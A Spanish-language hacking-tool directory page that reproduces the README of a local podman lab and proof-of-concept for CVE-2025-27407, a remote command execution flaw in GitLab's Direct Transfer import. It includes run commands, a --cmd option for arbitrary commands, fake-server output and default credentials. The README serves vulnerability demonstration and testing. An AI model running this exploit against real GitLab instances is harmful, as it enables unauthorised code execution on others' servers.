Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-27407 | Kitploit
Herramientas/GitHubGitHub/logggg2402/cve-2025-27407
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHublogggg2402/cve-2025-27407

CVE-2025-27407

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-27407 GitLab Podman Lab

Laboratorio mínimo solo local para demostrar que la ruta HTTP de Direct Transfer de GitLab alcanza el cargador de esquemas de introspección vulnerable de graphql-ruby. El laboratorio ejecuta un contenedor GitLab CE vulnerable; el script del PoC inicia su servidor fuente falso de GitLab en el mismo proceso solo durante las pruebas.

Ejecútalo únicamente contra sistemas que poseas o que estés autorizado explícitamente a probar.

Archivos

ArchivoPropósito
lab.shInicia, espera, verifica y limpia el laboratorio de GitLab.
poc_host_port_cmd.pyPoC de un solo uso: servidor fuente falso + disparador de inicio de sesión/configuración/importación de GitLab.

Requisitos

  • Host Linux con podman
  • curl
  • Puertos locales libres para GitLab y el servidor fuente falso del PoC
  • Suficiente RAM/disco para el contenedor Omnibus de GitLab

Valores predeterminados:

Iniciar el laboratorio

El puerto 8080 es el predeterminado del script. Si algo más ya lo usa, utiliza 18080 como se muestra aquí.

root@kitploit:~
cd gitlab-lab
chmod +x lab.sh poc_host_port_cmd.py

GITLAB_HTTP_PORT=18080 GITLAB_SSH_PORT=2225 ./lab.sh up

Abre GitLab en:

root@kitploit:~
http://127.0.0.1:18080

Credenciales de acceso:

root@kitploit:~
root / Cve27407Password!

root es solo el usuario predeterminado del laboratorio. El disparador del PoC no requiere una cuenta de administrador; cualquier usuario autenticado que pueda crear/importar en un espacio de nombres de destino puede alcanzar la ruta vulnerable de Direct Transfer. Usa --username y --password para probar con un usuario no administrador.

Ejecutar el PoC

root@kitploit:~
MARKER=/tmp/cve_2025_27407_gitlab_marker
podman exec cve-27407-gitlab rm -f "$MARKER"

./poc_host_port_cmd.py \
  --host 127.0.0.1 \
  --port 18080 \
  --listen-port 8001 \
  --wait-seconds 120 \
  --cmd "touch $MARKER"

MARKER="$MARKER" ./lab.sh verify

Señales esperadas:

root@kitploit:~
[*] create/import trigger status=200 final_url=http://127.0.0.1:18080/import/bulk_imports
[{"success":true,...}]
[evil-source] POST /api/graphql introspection -> malicious schema; command='touch ...'
[+] GitLab reached /api/graphql introspection over HTTP
[+] vulnerable: marker file exists inside GitLab container

Opciones

Anulación de variables de entorno

Solución de problemas

  • Si 8080 está ocupado, usa GITLAB_HTTP_PORT=18080 para ./lab.sh up.
  • Si el PoC no puede vincular su puerto de origen, cambia --listen-port a un puerto no utilizado.
  • Si la verificación del marcador entra en condición de carrera con el trabajador de importación en segundo plano, aumenta --wait-seconds o vuelve a ejecutar MARKER="$MARKER" ./lab.sh verify.
  • Si GitLab aún no está listo, vuelve a ejecutar GITLAB_HTTP_PORT=18080 ./lab.sh wait.
  • Si un laboratorio anterior se quedó bloqueado, ejecuta ./lab.sh cleanup y comienza de nuevo.

Limpieza

root@kitploit:~
./lab.sh cleanup

Esto elimina el contenedor de GitLab, cualquier contenedor heredado de fuente falsa de versiones anteriores del laboratorio y la red del laboratorio. No elimina las imágenes de Podman descargadas.

Descargar herramienta
ElementoPredeterminado
Imagen de GitLabdocker.io/gitlab/gitlab-ce:16.11.8-ce.0
Contenedor de GitLabcve-27407-gitlab
Red de Podmancve-2025-27407-net
Usuario root de GitLabroot
Contraseña de root de GitLabCve27407Password!
Marcador/tmp/cve_2025_27407_gitlab_marker
OpciónPropósitoPredeterminado
--hostHost de GitLab al que apuntarObligatorio
--portPuerto HTTP de GitLab al que apuntarObligatorio
--cmdComando ejecutado en el entorno de ejecución de GitLabtouch /tmp/cve_2025_27407_gitlab_marker
--listen-portPuerto local del servidor fuente falso8001
--wait-secondsTiempo para mantener viva la fuente falsa para los trabajadores asíncronos de GitLab90
--usernameUsuario de GitLabroot
--passwordContraseña de GitLabCve27407Password!
VariablePropósitoPredeterminado
GITLAB_HTTP_PORTPuerto HTTP de GitLab del host/contenedor8080
GITLAB_SSH_PORTPuerto SSH de GitLab del host2224
GITLAB_ROOT_PASSWORDContraseña inicial de rootCve27407Password!
GITLAB_IMAGEImagen de GitLab a ejecutardocker.io/gitlab/gitlab-ce:16.11.8-ce.0
NETWORKNombre de la red de Podmancve-2025-27407-net
MARKERArchivo verificado dentro del contenedor de GitLab/tmp/cve_2025_27407_gitlab_marker
TIMEOUT_SECONDSTiempo de espera de disponibilidad1200